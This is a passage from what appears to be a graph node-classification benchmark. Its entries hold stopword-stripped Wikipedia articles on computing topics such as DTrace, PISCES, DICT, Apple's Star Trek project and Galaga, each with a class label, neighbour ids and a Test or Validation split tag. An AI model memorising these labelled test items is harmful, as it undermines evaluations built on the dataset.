dtrace -n 'syscall entry num pid execname count dtrace -n 'io start printf pid execname args 0 b_bcount dtrace -n 'vminfo pgpgin pg execname sum arg0 scripts also written reach hundreds lines length although typically tens lines needed advanced troubleshooting analysis 200 examples open source dtrace scripts found dtracetoolkit created brendan gregg author dtrace book also provides documentation demonstrations dtrace first became available use november 2003 formally released part sun solaris 10 january 2005 dtrace first component opensolaris project source code released common development distribution license cddl dtrace integral part illumos illumos distributions opensolaris continuation dtrace standard part freebsd netbsd apple added dtrace support mac os x 10.5 leopard including gui called instruments 40 dtrace scripts dtracetoolkit included /usr/bin including tools examine disk i/o iosnoop process execution execsnoop unlike platforms dtrace supported mac os x flag p_lnoattach program may set disallows tracing process debugging utilities dtrace gdb original mac os x dtrace implementation could affect tracing system information unrelated probes fire program flag set running would fail os x 10.5.3 update addressed issue months later however since el capitan system integrity protection prevents user dtracing protected binary default linux port dtrace available since 2008 work continues actively enhance fix issues also active implementation github standard core providers available fbt syscall profile plus special instr provider solaris providers yet available linux dtrace implementation loadable kernel module means kernel requires modification thus allows dtrace avoid cddl vs. gpl licensing conflicts source form least however dtrace loaded kernel instance marked tainted 2007 developer qnx software systems announced blog colleague working incorporating dtrace qnx operating system oracle corporation added beta dtrace support oracle linux 2011 technology preview unbreakable enterprise kernel release 2 gplv2 dtrace linux kernel module originally released cddl general availability announced december 2012 march 11th 2019 microsoft released build dtrace windows 10 insider builds supported language provider dtrace retrieve context code including function source file line number location dynamic memory allocation garbage collection made available supported language supported language providers include assembly language c c++ java erlang javascript perl php python ruby shell script tcl application providers allow dtrace follow operation applications system calls kernel applications offer dtrace application providers include mysql postgresql oracle database oracle grid engine firefox dtrace designed implemented bryan cantrill mike shapiro adam leventhal authors received recognition 2005 innovations dtrace infoworld technology review dtrace top prize wall street journal 2006 technology innovation awards competition authors recognized usenix software tools user group stug award 2008",
    "neighbors": [
      4636,
      9245,
      5677,
      5177,
      8266,
      2123,
      7249,
      9306,
      11363,
      10340,
      5222,
      9320,
      8816,
      9844,
      5240,
      9343,
      6803,
      10387,
      2710,
      5280,
      2212,
      692,
      1718,
      5819,
      11459,
      8395,
      5335,
      7383,
      6361,
      10455,
      10478,
      1273,
      4858,
      1286,
      10000,
      274,
      5397,
      10016,
      10535,
      6445,
      7983,
      10036,
      11573,
      823,
      4426,
      6988,
      8012,
      1361,
      850,
      6491,
      8539,
      7521,
      1891,
      8554,
      366,
      2415,
      7022,
      7027,
      2421,
      2424,
      381,
      3462,
      1927,
      8582,
      8077,
      2967,
      8599,
      6041,
      1946,
      9625,
      6049,
      10148,
      5040,
      11698,
      9665,
      8644,
      9671,
      1993,
      5078,
      4571,
      477,
      8671,
      998,
      4073,
      9201,
      3058,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 11507,
    "label": 4,
    "text": "Separation_of_duties:separation duties separation duties sod also known segregation duties concept one person required complete task business separation sharing one individual one single task internal control intended prevent fraud error concept alternatively called segregation duties political realm separation powers democracies separation legislation administration serves similar purpose concept addressed technical systems information technology equivalently generally addressed redundancy separation duties key concept internal controls increased protection fraud errors must balanced increased cost/effort required essence sod implements appropriate level checks balances upon activities individuals r. a. botha j. h. p. eloff ibm systems journal describe sod follows separation duty security principle primary objective prevention fraud errors objective achieved disseminating tasks associated privileges specific business process among multiple users principle demonstrated traditional example separation duty found requirement two signatures cheque actual job titles organizational structure may vary greatly one organization another depending size nature business accordingly rank hierarchy less important skillset capabilities individuals involved concept sod business critical duties categorized four types functions authorization custody record keeping reconciliation perfect system one person handle one type function principally several approaches optionally viable partially entirely different paradigms person multiple functional roles opportunity abuse powers pattern minimize risk general categories functions separated primarily individual separation addressed selection term sod already well known financial accounting systems companies sizes understand combine roles receiving cheques payment account approving write-offs depositing cash reconciling bank statements approving time cards custody pay cheques etc sod fairly new information technology departments high percentage sarbanes-oxley internal audit issues come information systems segregation duties helps reduce potential damage actions one person end-user department organized way achieve adequate separation duties according isaca segregation duties control matrix duties combined one position matrix industry standard general guideline suggesting positions separated require compensating controls combined depending company size functions designations may vary duties separated compensating controls place compensating controls internal controls intended reduce risk existing potential control weakness single person carry conceal errors and/or irregularities course performing day-to-day activities assigned sod incompatible duties several control mechanisms help enforce segregation duties accounting profession invested significantly separation duties understood risks accumulated hundreds years accounting practice contrast many corporations united states found unexpectedly high proportion sarbanes-oxley internal control issues came separation duties commonly used large organizations single person position introduce fraudulent malicious code data without detection role-based access control frequently used systems sod required strict control software data changes require person organizations performs one following roles exhaustive presentation software development life cycle list critical development functions applicable separation duties successfully implement separation duties information systems number concerns need addressed",
    "neighbors": [
      10529,
      10340,
      9966,
      210,
      10196,
      5433,
      3323,
      10398
    ],
    "mask": "Test"
  },
  {
    "node_id": 11508,
    "label": 1,
    "text": "PISCES:pisces pisces personal identification secure comparison evaluation system border control database system largely based biometrics developed booz allen hamilton inc.. pisces-project initiated department state terrorist interdiction program tip 1997 initially system countries improving watchlisting capabilities providing mainframe computer system facilitate immigration processing half dozen countries foreign authorities used technology watchlist exchange information united states department state suspected terrorists appearing borders information used track apprehend individual terrorists wide-ranging analysis terrorist travel methods according us-government reports matches passengers inbound united states facial images fingerprints biographical information airports high-risk countries high-speed data network permits u.s. authorities informed problems inbound passengers pisces workstations installed throughout country linked wide area network participating nation ’ immigration police intelligence headquarters headquarters provided automated capability monitor activities immigration points evaluate traveler information conduct real time data analysis currently pisces-project falls terrorist interdiction program tip ongoing programme united states department state tip provides necessary software hardware mostly commercial off-the-shelf cameras passport scanners full installation operator training system sustainment additionally tip assists immigration business process improvement ports entry chosen pisces installation fy 2007 funds used support enhancements existing watch listing system software order provide fraudulent document detection capability biometrics search capability improved name-searching effectiveness starting fy 2010 onward fy 2011 pisces funding increased united states department state considers high risk countries afghanistan iraq pakistan project verify us visas via limited access us government database go trial select outposts although pisces operational months prior september 11 2001 apparently failed detect terrorists involved attack according us department state 2003 currently deployed five countries scheduled deployment 12 countries calendar year arrests detentions occurred five countries system deployed 2005 since 2001 twenty nations provided capability expected 2011 31 27 march 2018 country us government signed memorandum intention donation system personal identification secure comparison evaluation pisces cooperation bosnia council ministers us government aims install maintain hardware software required pisces system operate starting international airport sarajevo later expanding airports border crossings country",
    "neighbors": [
      10207
    ],
    "mask": "None"
  },
  {
    "node_id": 11509,
    "label": 5,
    "text": "DICT:dict dict dictionary network protocol created dict development group described rfc 2229 published 1997 goal surpass webster protocol allow clients access dictionaries use dict servers clients use tcp port 2628 standard dictd server made dict development group uses special dict file format although dictd servers gnu dico may optionally use file formats dictionaries standard dict file format made two files .index file .dict file .dict.dz compressed files usually written manually compiled program called dictfmt example unix command compile unicode-compatible dict file called mydict heading dictionary mydict.txt jargon file format i.e dictionary file produced installing server normally matter typing something like dictd server used telnet example connect dict server localhost unix system one normally type enter command help see available commands standard dictd package also provides dict command command-line use sophisticated dict clients include also programs read dict file format directly example s60dict dictionary program symbian series 60 uses dict dictionaries additionally dict clients fantasdic also capable reading dict format directly order efficiently store dictionary data dictzip extension gzip compression format also name utility used compress .dict file dictzip compresses file chunks stores chunk index gzip file header thus allowing random access data",
    "neighbors": [
      10242,
      5251,
      3218,
      10269,
      416,
      35,
      5677,
      6319,
      10033,
      6330,
      4797,
      7364,
      4933,
      4561,
      5078,
      10727,
      11112,
      5482,
      9834,
      5492,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 11510,
    "label": 7,
    "text": "Korea_Internet_Neutral_Exchange:korea internet neutral exchange korea internet neutral exchange kinx inc. carrier-neutral internet exchange ix south korea b2b company specializes internet infrastructure kinx provides internet data center idc content delivery network cdn cloud computing services customers headquarters seoul south korea june 2019 kinx 116 employees kinx operates layer 2-based internet exchange south korea data center carrier-neutral means domestic international internet service providers isp well content providers cps independent network providers could freely select peering partners kinx expanding international coverage establishing point presence pop hong kong tokyo japan kinx currently operating four idcs – carrier-neutral – near seoul area ix participants include daum-kakao whose popular messenger service kakaotalk boasts 140 million users kinx cdn solution based peering domestic international isps delivers contents fast stable manner provides streaming cache downloading services main customers kinx ’ solution gaming companies com2us neowiz games need deliver contents end-users media outlets korea economic daily financial news provide real-time news updates audience 2012 kinx introduced 'ixcloud becoming first korean company provide public cloud service utilizes openstack also provides support public private companies efforts establish private cloud service since 2011 kinx partnership appcenter provided cloud service mobile web developers free-of-charge 2014 kinx signed mou neoply program managed neowiz games support startups provide infrastructure cloud service early days internet south korea domestic internet traffic go via overseas internet exchange points demand internet rose dramatically government find way address network ’ low quality rising costs furthermore particularly concerned rapid rise volume internet traffic issues mind nca national computerization agency established korea internet exchange kix first ix south korea due various circumstances however nca privatized kix december 1996 korea telecom kt corporation began operating korea telecom internet exchange ktix dacom lg uplus founded dacom internet exchange dix rather solving problems ktix dix brought challenges rising service charges ix customers pay 1998 address issues 16 isps excluding kt dacom hosted 'korea internet interconnection conference led establishment korea internet neutral exchange kinx june 2000",
    "neighbors": [
      10368,
      10017,
      4194,
      8170,
      7248,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 11511,
    "label": 4,
    "text": "Wicked_Rose:wicked rose wicked rose pseudonym chinese hacker responsible developing ginwui rootkit used internet attacks summer 2006 suggested works chinese army tan dailin graduate student sichuan university noticed attacking japanese site people ’ liberation army pla summer 2005 invited participate pla-sponsored hacking contest subsequently participated one-month 16-hour-per-day training program students simulated various cyber invasion methods built dozens hacking exploits developed various hacking tactics strategies chosen sichuan regional team compete teams yunnan guizhou tibet chongqing military district team ranked number one cash prize 20,000 rmb pseudonym wicked rose formed network crack program hacker group ncph group recruited talented hackers school found funding source unknown benefactor started attacking us sites initial round successful attacks funding tripled 2006 ncph built sophisticated rootkits launched barrage attacks multiple us government agencies end july 2006 ncph created 35 different attack variants one ms office vulnerability testing phase ncph used word document vulnerabilities switched excel later powerpoint vulnerabilities result activity ncph group siphoned thousands millions unclassified us government documents back china",
    "neighbors": [
      3455
    ],
    "mask": "Test"
  },
  {
    "node_id": 11512,
    "label": 1,
    "text": "Archives_Hub:archives hub archives hub jisc service freely available provides cross-search descriptions archives held across uk 320 institutions including universities colleges specialist repositories charities businesses institutions includes 1,000,000 descriptions archive materials manner subjects represents 30,000 archive collections also describes content available topic based websites often created result digitisation projects hub hold archives rather maintains finding aids help researchers locate archives enabling search across descriptions description provides direct email link contact details repository holds archive enables researchers search filter various criteria including keyword title creator person organisation subject date order bring together archives held country relate topic includes images links digital content enables filtering digital non-digital content descriptions navigated via table contents 'search within function contributors provide new updated descriptions regularly service constantly updated descriptions archives newly catalogued made available research archives hub supporting information researchers including introductory guide publishes monthly features created contributors manner subjects people organisations showcase variety archival content described archives hub ethos based open access ‘ making data work harder ’ hub recently developed 'micro sites repository interfaces available higher education institutions wanting search application descriptions stored hub also provides data archives portal europe descriptions hub standards-based using isad g international archival standard standards data languages dates index terms standards takes provides ead encoded archival description xml archives site provides information archivists cataloguers online discovery data creation use standards metadata protocols interoperability facilitate cross-searching",
    "neighbors": [
      2948
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11513,
    "label": 2,
    "text": "Star_Trek_project:star trek project star trek code name given secret prototype project running port mac os 7 applications intel-compatible x86 personal computers project starting february 1992 conceived collaboration apple computer provided majority engineers novell time one leaders cross-platform file-servers plan novell would market resulting os challenge microsoft windows project discontinued 1993 never released although components reused projects project named star trek science fiction franchise slogan boldly go mac gone impetus creation star trek project began novell desire increase competition monopoly microsoft dos-based windows products microsoft eventually convicted many years later illegal monopoly status novell called microsoft presence predatory us department justice called exclusionary unlawful novell first idea extend desktop presence graphical computing environment adapt digital research gem desktop environment novell legal department rejected due apprehension possible legal response apple company went directly apple shared concerns anti-competitive marketplace intel ceo andy grove supported two companies launching joint project star trek february 14 1992 valentine day apple set deadline october 31 1992 halloween day promising engineering team members performance bonus large cash award vacation cancun mexico project team member fred monroe later reflected worked like dogs fun ’ working achieving deadline goal receiving bonuses developers eventually reached point could boot intel 486 pc specific hardware system 7.1 on-screen appearance indistinguishable mac however every program would need ported new x86 architecture run supposed programs could ported little effort apple developed equivalent headers x86 tagline project boldly go mac gone computerworld mocked comment os boldly goes everyone else however project canceled mid-1993 political infighting personnel issues questionable marketability project apple side project seen exit supportive ceo john sculley favor new ceo michael spindler spindler interested project instead reallocating software engineering resources toward company total migration competing powerpc architecture macintosh operating system launched natively intel hardware official transition mac os x 2006 star trek designed hybrid apple macintosh operating system made run operating system gui shell application upon novell next in-development version dr dos operating system designed user could think standalone application platform general computing environment concept similar microsoft competing windows 3.1x running top dos radical tedious departure technologically culturally time mac os ever officially run apple computers based motorola 68000 architecture system built successor digital research dr dos 6.0 bdos level 6.7 7.1 netware palmdos 1.0 code named merlin bdos level 7.0 novell dr dos panther fully pc dos compatible 16-bit disk operating system genuinely dos compatible internal data structures bootstrapping media access device drivers file system support system would utilize dr dos new vladivar extended dos component flat memory support development since 1991 vladivar codice_1 aka codice_2 codice_3 dynamically loadable 32-bit protected mode system core advanced memory management hardware virtualization scheduling domain management pre-emptive multithreading within applications well multitasking independent applications running different virtual dos machines comparable windows 386 enhanced mode without gui thereby previously loaded dos environment including device drivers became part system domain multitasker unless specific protected mode virtual device drivers loaded hardware access got tunneled 16-bit sub-system default maximum speed minimum resource footprint dr dos bios bdos kernel device drivers memory managers multitasker written pure x86 assembly language apple port system 7.1 would run top high-performance yet light-weight hybrid 32-bit/16-bit protected mode multitasking environment graphical system shell user space macintosh resource forks long filenames mapped onto fat12 fat16 file systems though joint effort canceled novell published long-awaited dr dos 7.0 novell dos 7 bdos 7.2 1994 besides many additions areas advanced memory disk management networking novell dos 7 provided novell underlying stdos components dr dos panther vladivar projects except graphical star trek component jointly developed apple novell instead taskmgr provided text mode interface underlying multitasker emm386 system also provided api allow third-party guis take control microsoft windows viewmax 2 3 pc/geos newdeal known utilize interface run novell dos 7 successors opendos 7.01 dr-dos 7.02 higher star trek would yet another one fact additional hooks implemented specifically star trek gui frame buffer access hooks never stripped emm386 left undocumented apple reused platform abstraction technology developed star trek incorporating concurrently developed—and consider competing—migration powerpc architecture abstraction technology included capability loading mac os rom data file instead rom chip former star trek team members fred monroe fred huxham formed company fredlabs inc january 1997 company released virtualmac mac os application compatibility virtual machine beos apple first quickly aborted concept porting flagship operating system intel systems 1985 following exit steve jobs apple reattempt effort star trek n't launch product 2006 apple actually shipped products based upon concept hybridizing mac os 7 shell application platform accomplished form codice_4 process hybridized applications launched atop unix-based a/ux system also accomplished form macintosh application environment mae functional equivalent star trek plus embedded 68k emulator case system 7 power macintosh running application solaris hp/ux apple also delivered dos compatible models macs hybridized mac concurrently functional intel coprocessor card inside mac os 7 later always dos filesystem compatibility although direct x86 port classic mac os never released public determined users could make apple retail os run upon non-mac computers emulation development emulation environments said inspired initiative shown star trek project two popular 68k macintosh emulators vmac basilisk ii powerpc macintosh emulator sheepshaver written third parties ten years project star trek became possible natively run darwin unix-based core mac os x x86 platform virtue nextstep foundation port widely available darwin open source apple public source license however mac os x graphical user interface named aqua proprietary included darwin depended window managers running x11 graphical interfaces thus commercial mac os applications run natively darwin alone apple ran similar project star trek mac os x called marklar later referred steve jobs secret double life publicly power pc-only mac os project retain openstep x86 port keeping mac os x supporting applications including ilife xcode running x86 architecture well powerpc marklar publicly revealed apple ceo steve jobs june 2005 announced macintosh transition intel processors starting 2006 comparing contrasting apple efforts ibm long since attempted different strategy provide essential goal innovating new software platform upon commodity hardware nondestructively preserving existing legacy installations ms-dos heritage however strategy based upon os/2 operating system long since achieved seamless backward compatibility ms-dos applications 1992 roughly coinciding timeframe star trek project ibm devised new fundamentally integral subsystem backward compatibility windows 3.0 windows 3.1 applications new subsystem os/2 called win-os/2 integrated beginning os/2 2.0 although conceived different legacy business requirements cultures win-os/2 designed similar software engineering objectives virtualization techniques star trek coincidentally ibm also code-named os/2 releases star trek themes would eventually make references integral os/2 public brand beginning os/2 warp apple ibm attempted several proprietary cross-platform collaborations including unreleased port quicktime os/2 significant traction opendoc software framework aim alliance kaleida labs taligent companies utilized actual personnel star trek television movie franchise promotional purposes corporation formerly known ardi developed product called executor run compatible selection 68k macintosh applications hosted upon either dos linux operating systems intel cpu executor cleanroom reimplementation macintosh toolbox versions 6 7 operating system integrated 68k cpu emulator called syn68k liken andataco sun hp workstations emulates macintosh hardware environment including 68k cpu upon user must install system 6.0.7 quorum software systems made two apps targeting unix workstations equal provides binary compatibility emulating mac apis 68k cpu put precertified mac app x window sun sgi workstations latitude provides source code porting layer display postscript driver",
    "neighbors": [
      10755,
      9732,
      2058,
      1042,
      4114,
      9762,
      7204,
      6186,
      8754,
      10804,
      9784,
      8767,
      576,
      8774,
      1623,
      9308,
      3167,
      3681,
      5220,
      7269,
      8303,
      2672,
      9329,
      4727,
      9337,
      6778,
      9340,
      3197,
      2179,
      7307,
      6797,
      3216,
      2201,
      11430,
      2729,
      3241,
      7849,
      3248,
      178,
      3791,
      3286,
      1247,
      5860,
      6377,
      2282,
      10478,
      4337,
      8441,
      3323,
      6921,
      2839,
      2840,
      10016,
      2345,
      11562,
      7983,
      9525,
      7991,
      4409,
      2363,
      2365,
      2366,
      7999,
      10052,
      10067,
      4441,
      10083,
      3948,
      5492,
      10113,
      6023,
      6539,
      11171,
      4548,
      477,
      7133,
      6625,
      5093,
      3056,
      1522,
      499,
      5619,
      11257,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 11514,
    "label": 4,
    "text": "Security_Protocols_Open_Repository:security protocols open repository spore security protocols open repository online library security protocols comments links papers protocol downloadable variety formats including rules use automatic protocol verification tools protocols described using ban logic style used clark jacob goals database includes details formal proofs known attacks references comments analysis papers large number protocols listed including many shown insecure continuation seminal work john clark jeremy jacob seek contributions new protocols links comments",
    "neighbors": [
      8674,
      2580
    ],
    "mask": "Test"
  },
  {
    "node_id": 11515,
    "label": 7,
    "text": "Flow_(software):flow software computing flow middleware software allows data-integration specialists connect disparate systems whether on-premises hosted cloud transforming restructuring data required environments flow functionality utilised data integration projects edi data-conversion activities developed flow software ltd new zealand flow available variety partner companies directly flow software new zealand australia integration software allows organisations continue using existing applications overcoming need customize upgrade requirements change using integration software many businesses benefit reduced dependence manual keying data avoidance costs delays caused keying errors flow enables data management flow accesses generates data structured formats files databases flow access read write databases using either sql89 sql92 specification informix provides support extended sql use flow access read write various file types visual mapping engine used configure data transformation data sets data restructured transformed thus allowing dissimilar data structures source destination flow data access operates independently mapping layer applied mapping logic uses events containing object pascal code flow transports generated data files using following formats flow user interface allows users create processes activate processes view activity logs email notifications flow process activity also configured flow uses predefined processing events executed either schedule event driven actions results logged available via user interface actions include flow includes report writer based software report builder report writer create custom notification reports providing users details related transactions reports created xml pdf jpeg xls reports embedded email messages required",
    "neighbors": [
      6850,
      4194,
      7364,
      7523,
      10340,
      7022,
      9263,
      9909,
      10486,
      11030,
      3096,
      8122,
      10236,
      4797,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 11516,
    "label": 9,
    "text": "Unparser:unparser computing unparser system constructs set characters image components given parse tree unparser effect reverse traditional parser takes set string characters produces parse tree unparsing generally involves application specific set rules parse tree tree walk takes place given tree may involve textual graphic elements unparser may two separate modules handles relevant components cases master unparser looks master unparse table determine given nested structure handled one module",
    "neighbors": [
      2440,
      5399
    ],
    "mask": "Test"
  },
  {
    "node_id": 11517,
    "label": 2,
    "text": "Cray_Time_Sharing_System:cray time sharing system cray time sharing system also known cray user community ctss developed operating system cray-1 cray x-mp line supercomputers ctss developed los alamos scientific laboratory lasl lanl conjunction lawrence livermore laboratory lll llnl ctss popular cray sites united states department energy doe used several cray sites san diego supercomputing center predecessor ctss livermore time sharing system ltss ran control data cdc 7600 line supercomputers first compiler known lrltran lawrence radiation laboratory fortran fortran-66 language dynamic memory features cray version including automatic vectorization known cvc pronounced civic like honda car period cray vector compiler controversy existed lasl first attempt develop operating system cray-1 named deimos message-passing unix-like operating system forrest basket deimos initial teething problems common performance early operating systems left bad taste unix-like systems national laboratories manufacturer cray research inc. hardware went develop batch oriented operating system cos cray operating system vectorizing fortran compiler named cft cray fortran written cray assembly language cal ctss misfortune certain constants structures lacking certain networking facilities tcp/ip optimized cray-1 architecture-dependent without extensive rework larger memory supercomputers like cray-2 cray y-mp came use ctss final breaths running cray instruction-set-compatible hardware developed scientific computer systems scs-40 scs-30 supertek s-1 save software ctss embodied certain unique ideas market-driven priorities working/running processes attempt succeed ctss started llnl named nltss new livermore time sharing system embody advanced concepts operating systems better integrate communication using new network protocol named lincs also keeping best features ctss nltss followed development fate many operating systems briefly ran period cray hardware late 1980s user-level ctss overview 1982 provides chapter 2 brief list ctss features references likely found proceedings cray user group cug acm sosp symp operating systems proceedings however owing fact lanl llnl nuclear weapons facilities aspects security likely doom finding greater detail many pieces software",
    "neighbors": [
      11205,
      1031,
      1480,
      7432,
      7497,
      7983,
      6675,
      5397,
      2135,
      2303
    ],
    "mask": "Test"
  },
  {
    "node_id": 11518,
    "label": 3,
    "text": "Finders_Keepers_(1985_video_game):finders keepers 1985 video game finders keepers computer game written david jones first game magic knight series published mastertronic label zx spectrum amstrad cpc msx commodore 64 commodore 16 1985 published united kingdom budget price £1.99 zx spectrum sold 117,000 copies across 8-bit formats 330,000 copies making mastertronic second best-selling original game bmx racers magic knight sent castle spriteland king ibsisima order find special present princess germintrude magic knight successful quest may proved worthy joining famous polygon table reference mythical round table legends king arthur gameplay finders keepers markedly different magic knight games essentially graphic adventures platform elements finders keepers basically platform game maze sections hero starts king throne room transported via teleporter castle castle made two types playing area flick-screen rooms manner platform game two large scrolling mazes zx spectrum amstrad cpc msx cold upper maze slimey lower maze commodore 64 consist castle gardens castle dungeons additional part gameplay ability collect objects found rooms mazes scattered around castle sell money objects combine react create object higher value example 'bar lead 'philosophers stone react create 'bar gold amount money magic knight carrying market value inventory displayed on-screen buying selling objects done various traders live castle castle spriteland full dangerous creatures inhabit many rooms well mazes collision saps magic knight strength loses strength loses one four lives zzap 64 impressed game described little masterpiece another quality product mastertronic given 90 overall rating finders keepers followed-up three magic knight games spellbound published 1985 knight tyme published 1986 stormbringer published 1987",
    "neighbors": [
      10931,
      5828,
      9006,
      8823
    ],
    "mask": "Test"
  },
  {
    "node_id": 11519,
    "label": 2,
    "text": "Task_View:task view task view task switcher virtual desktop system introduced windows 10 among first features new windows 10 task view allows user quickly locate open window quickly hide windows show desktop manage windows across multiple monitors virtual desktops clicking task view button taskbar swiping left side screen displays open windows allows users switch switch multiple workspaces first previewed september 30 2014 windows 10 press event downtown san francisco similar effects used operating systems windows 3.0 first introduced window switcher 1990 using users could see flattened view open windows every version windows since also provided window switching functionality windows vista windows 7 provide additional feature called windows flip 3d broadly similar purpose flip 3d allows user flip open windows 3d perspective downside method front window covers significant portion windows unlike mission control macos hand allows user see contents front window difficult mission control especially user large number windows open vista desktop window manager exposes public api allows application access thumbnail representations flip3d uses number third party add-ons able provide mission control-like functionality vista third party applications emcee desktop organizer provide mission control like organization similar windows visual stacks support windows 8 immersive apps microsoft intellipoint software microsoft mice feature similar mission control also works live images windows rather static representations additionally several freeware windows applications exist emulate functionality mission control compiz kwin compositing window managers systems using x window system include plugins similar mission control scale plugin compiz present windows effect kwin skippy also performs similar functions mission control starting version 3.0 gnome desktop environment gained new mode called overview used launch applications manage workspaces mode windows scaled arranged mission control-like fashion quick switching chrome os window overview mode shows thumbnail open windows available pressing 'window switcher key swiping 3 fingers trackpad windows overview mode closed clicking associated close button selected clicking window thumbnail also closes overview mode brings selected window foreground classic legacy macintosh systems free finder workspaces offers functionality similar spaces mission control macos allows user quickly locate open window quickly hide windows show desktop manage windows across multiple monitors virtual desktops activated f3 key f9 older keyboards apple magic mouse multi-touch trackpads activated pulling trackpad three four fingers mission control redesigned feature extensively show running desktops",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      8296,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10388,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 11520,
    "label": 4,
    "text": "OpenCA:openca openca officially openca pki research labs formerly openca project pki collaborative effort develop robust full-featured open-source out-of-the-box certification authority implementing used protocols full-strength cryptography openca based many open-source projects among openldap openssl apache projects project development divided 2 main tasks studying refining security scheme guarantees best model used certificate authority developing software easily set manage ca software development side project divided following sub-projects problem public key infrastructures pkis applications secured certificates keys difficult sometimes expensive set pkis flexible trustcenter software expensive openca started 1999 first idea consisted three major parts perl web interface openssl backend cryptographic operation database simple concept still developers motto today nearly operations performed via web interface six preconfigured interfaces many created depending need cryptographic backend openssl way disadvantage openca aimed build organizational infrastructure pki openca databases store needed information users cryptographic objects like certificate signing requests csrs certificates certificate revocation requests crrs certificate revocation lists crls today openca supports following elements incomplete list give impression complex subject matter openca designed distributed infrastructure handle offline ca online ra using build whole hierarchy three levels openca small solution small medium research facilities goal support maximum flexibility big organizations like universities grids global companies",
    "neighbors": [
      517,
      10831,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 11521,
    "label": 2,
    "text": "Remote_Install_Mac_OS_X:remote install mac os x remote install mac os x remote installer use macbook air laptops network works run macintosh windows-based pc optical drive connecting network client macbook air lacking optical drive perform system software installs remote install mac os x released part mac os x 10.5.2 february 12 2008 starting march 2009 version mac mini also supports remote install allowing dvd drive replaced second hard drive launch mac os x lion apple omitted remote install workaround enable target disk mode",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      576,
      9802,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      9343,
      3719,
      10888,
      11402,
      6797,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      4309,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      7928,
      8441,
      7422,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      9035,
      1878,
      4457,
      9100,
      6037,
      9109,
      1439,
      6093,
      7118,
      3035,
      4571,
      4068,
      5093,
      487,
      10221,
      5619,
      11257,
      7163
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11522,
    "label": 3,
    "text": "Galaga:galaga development led shigeru yokoyama small team initial planning took two months finish originally developed namco galaxian arcade board instead shifted new system suggested namco research development division inspiration duel fighter mechanic taken film yokoyama seen prior development ship captured using large circular beam project became immensely popular around company namco president masaya nakamura even taking interest although early location tests proved unsuccessful galaga received critical acclaim widely regarded classic golden age arcade video games one greatest video games time critics applauded gameplay innovation addictive nature improvements made predecessor several home ports released multitude platforms including msx atari 7800 nintendo entertainment system alongside releases digital distribution platforms xbox live arcade galaga also included many namco compilations followed sequel 1984 gaplus galaga fixed shooter video game player mans lone starfighter bottom screen must prevent galaga forces destroying mankind objective stage defeat galaga aliens fly formation top sides screen similar galaxian aliens dive towards player shooting projectiles colliding either result life lost atop enemy formation four large aliens known “ boss galaga ” take two shots destroy aliens ability release tractor beam capture player ship returning top formation costing player life additional lives remain player opportunity shoot boss galaga holding captured ship shooting dives towards player result captured ship rescued join player ship transforming duel fighter additional firepower larger hitbox however destroying boss galaga captured ship formation instead fighter turn player diving towards ship shooting projectiles third stage every fourth thereafter “ challenging stage ” aliens fly pre-set formation without firing player shooting alien stages award player 10,000 point bonus enemies ability morph new enemy types different attack patterns one even taking form galaxian flagship stages indicated emblems located bottom-right screen enemies become aggressive game progresses increasing number projectiles diving faster rate galaga created japanese developer shigeru yokoyama long-time veteran namco worked many company earlier games namco first big hit arcades galaxian 1979 credited one first video games utilize rgb color graphics success lead namco produce large amount namco galaxian arcade boards order keep demand however early 1980s game becoming harder sell help clear inventory yokoyama tasked creating two new games could run namco galaxian board first king balloon 1980 fixed shooter cited first video game incorporate speech second game instead made newer hardware suggested namco research development division new arcade board named namco galaga used several future games including bosconian 1981 dig dug 1982 although yokoyama given explicit instructions make shooting game management expressed desire make game similar galaxian initial planning project took two months idea dual fighter stemmed yokoyama wanting create enemies different attack styles tractor beam emitted boss galaga inspired film yokoyama seen prior development character ship captured circling laser taking interest idea yokoyama decided incorporate game enemy could capture player ship beam ship would need rescued originally rescuing captured ship would award player extra life soon changed fight alongside player idea proved problem first due hardware limitations game could display limited number sprites resulting duel fighter unable shoot missiles workaround yokoyama made 16x16 sprite ship 16x16 sprite bullets reducing total sprite count two inspired intermissions pac-man 1980 bonus stages rally-x 1980 yokoyama decided add special bonus level game planning lead programmer tetsu ogawa informed software bug found game enemies would simply fly screen instead moving formation ogawa expressed interest incorporating idea game leading inclusion challenging stages.enemies originally flew one type pattern added increase replay value graphic designer hiroshi ono designed many game sprites including player ship boss galaga alien prior location testing team focused designing instruction card sheet paper showed game played text done planners actual design handled graphic artist card originally showed 